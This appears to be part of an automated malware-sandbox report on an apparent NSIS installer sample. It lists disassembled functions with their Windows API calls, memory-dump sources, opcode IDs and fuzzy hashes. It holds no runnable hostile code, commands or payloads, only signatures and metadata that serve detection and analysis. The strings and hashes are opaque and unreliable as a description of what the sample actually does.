                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                      • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                      • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                      • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                      • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                      • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                      • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                      APIs
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$Enum
                                                                                                      • String ID:
                                                                                                      • API String ID: 464197530-0
                                                                                                      • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                      • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                      • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                      • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                      APIs
                                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                      • GetLastError.KERNEL32 ref: 00405976
                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                      • GetLastError.KERNEL32 ref: 00405995
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                      • String ID:
                                                                                                      • API String ID: 3449924974-0
                                                                                                      • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                      • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                      • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                      • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                      APIs
                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405D76
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405E1E
                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0), ref: 00405E2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                      • String ID: 0_B
                                                                                                      • API String ID: 3248276644-2128305573
                                                                                                      • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                      • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                      • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                      • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                        • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                      • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                      • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                      • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75923420,004036EF), ref: 00405F46
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: nsa
                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                      • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                      • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 004059E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                      • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                      • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                      • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                      • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                      • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                      • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                      • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                      • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                      • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                      • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                      • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                      • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                      • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                      • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Haq$l4($$]q$$]q
                                                                                                      • API String ID: 0-272083239
                                                                                                      • Opcode ID: 124ab042dbd19248507fa3b0850a08439ab570579bbacc342bd023b8ebbc7959
                                                                                                      • Instruction ID: 131941cb7ca5ea476838e2ca5dfd0cb62e68cd5ebe6cf762b0f5bf22f2de3727
                                                                                                      • Opcode Fuzzy Hash: 124ab042dbd19248507fa3b0850a08439ab570579bbacc342bd023b8ebbc7959
                                                                                                      • Instruction Fuzzy Hash: F351AF317046118FCB19AB399C6853E3AEBAFC574039D4469E403EB3A1EF24CD52CB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                      • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                      • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                      • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                      • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                      • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                      • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                      • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                      • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                      • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                      • API String ID: 0-4015495023
                                                                                                      • Opcode ID: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
                                                                                                      • Instruction ID: d0932c7e45d583259275ee1318d8f83b5ee2e164a1a3b18531ac185df81bda38
                                                                                                      • Opcode Fuzzy Hash: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
                                                                                                      • Instruction Fuzzy Hash: B8318030E0121A9FDF658FB9CD403AEBAB6BF84310F1940A9C815A7254EB70CD95DB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                      • API String ID: 0-2351511683
                                                                                                      • Opcode ID: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
                                                                                                      • Instruction ID: f76c8724b9a3b84dfbcdeaa467bc0c631769f37ac3b2c0d2e4a37d53c9ac6b21
                                                                                                      • Opcode Fuzzy Hash: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
                                                                                                      • Instruction Fuzzy Hash: F4018431740915CFCB688E2DCC9092577EBAF88778B254569E445CB374DB31DC51C790
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0
                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                      • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                      • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98